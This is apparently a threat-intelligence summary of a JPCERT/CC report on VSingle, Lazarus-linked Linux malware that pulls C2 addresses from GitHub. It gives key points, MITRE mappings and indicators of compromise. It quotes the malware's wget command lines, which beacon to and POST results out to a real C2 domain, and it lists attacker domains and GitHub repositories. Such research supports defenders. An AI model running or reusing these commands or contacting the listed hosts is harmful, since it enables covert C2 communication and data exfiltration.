Threat Research

VSingle malware that obtains C2 server information from GitHub – JPCERT/CC Eyes

Securonix

VSingle, a Lazarus-linked malware, has been updated to fetch C2 server information from GitHub instead of relying solely on hard-coded C2 endpoints. The Linux variant uses wget for C2 communication, stores responses in /tmp/.sess_* files, and dynamically discovers GitHub repositories to obtain new C2 addresses. Hashtags: #VSingle #Lazarus

Keypoints

  • The Linux version of VSingle retrieves C2 server data from GitHub when its three hard-coded C2 servers are unavailable.
  • Communication to the C2 uses HTTP(S), including specific GET requests to fetch C2 information from a remote server.
  • The first request includes uid (hashed hostname/kernel/IP) and upw (Base64-encoded string) parameters sent to the C2.
  • Command responses are saved to files under /tmp (e.g., /tmp/.sess_%08x) and the contents include AES key, IV, and command (encoded with Base64+RC4).
  • The malware’s GitHub access pattern uses a dynamic raw.githubusercontent.com URL structure to obtain potential C2 endpoints.
  • wget is used to execute C2 communications (unlike Windows variants that use native APIs), and results are exfiltrated via HTTP POST.
  • Mitigation suggested includes limiting accessible destinations and being aware of legitimate services being abused for C2 (Appendix lists specific IOCs).

MITRE Techniques

  • [T1071.001] Web Protocols – The malware uses HTTP GET/POST to retrieve C2 data (e.g., the first communication to a C2 URL). Bracket quote: “‘The first communication sends the following data. uid contains a hashed value of the hostname, kernel release number, and an octet of IP address combined. upw contains a Base64-encoded string of “[IP address]|30.0|12b”‘.”
  • [T1059.004] Unix Shell – The Linux variant executes shell commands, including wget, to perform network communication. Bracket quote: “‘wget -t 1 –server-response –no-check-certificate –user-agent=… “https://mantis.westlinks.net/api/soap/mc_enum.php?uid=…&upw=…” -O /tmp/.sess_7b00cf8e 2>&1 | awk ‘/^ HTTP/{print $2}”.”
  • [T1027] Obfuscated/Encrypted Data – The data in the saved file is Base64-encoded and the command/content is handled with Base64+RC4. Bracket quote: “‘The contents of the file (/tmp/.sess_%04x) in which the execution results are saved are Base64-encoded and sent via HTTP POST communication as shown below.’”
  • [T1041] Exfiltration Over C2 Channel – Command execution results are sent via HTTP POST after being encoded/packed. Bracket quote: “‘wget -t 1 –server-response –no-check-certificate –post-data=… -O /tmp/.sess_7b00cf8e 2>&1 | awk ‘/^ HTTP/{print $2}’”‘
  • [T1105] Ingress Tool Transfer – The malware accesses GitHub to obtain new C2 servers, indicating a download/transfer of C2 data from external sources. Bracket quote: “‘The malware accesses GitHub to obtain new C2 servers.’”

Indicators of Compromise

  • [Domain] mantis.westlinks.net – C2 endpoint domain used in GET requests to retrieve C2 data
  • [Domain] www.shipshorejob.com – C2-related domain listed as a potential endpoint
  • [Domain] crm.vncgroup.com – C2-related domain listed as a potential endpoint
  • [Domain] ougreen.com – C2-related domain listed as a potential endpoint
  • [Domain] tecnojournals.com – C2-related domain listed as a potential endpoint
  • [URL] https://github.com/bgrav1ty13j/bPanda3 – GitHub repository used by attacker
  • [URL] https://github.com/fwo0d17n/fWr0te – GitHub repository used by attacker
  • [File name] /tmp/.sess_%08x – pattern for saved C2 response data
  • [File name] /tmp/.sess_%04x – pattern for saved command output data
  • [File hash] 199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1 – malware sample hash (Appendix C)
  • [File hash] 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc – malware sample hash (Appendix C)

Read more: https://blogs.jpcert.or.jp/en/2022/07/vsingle.html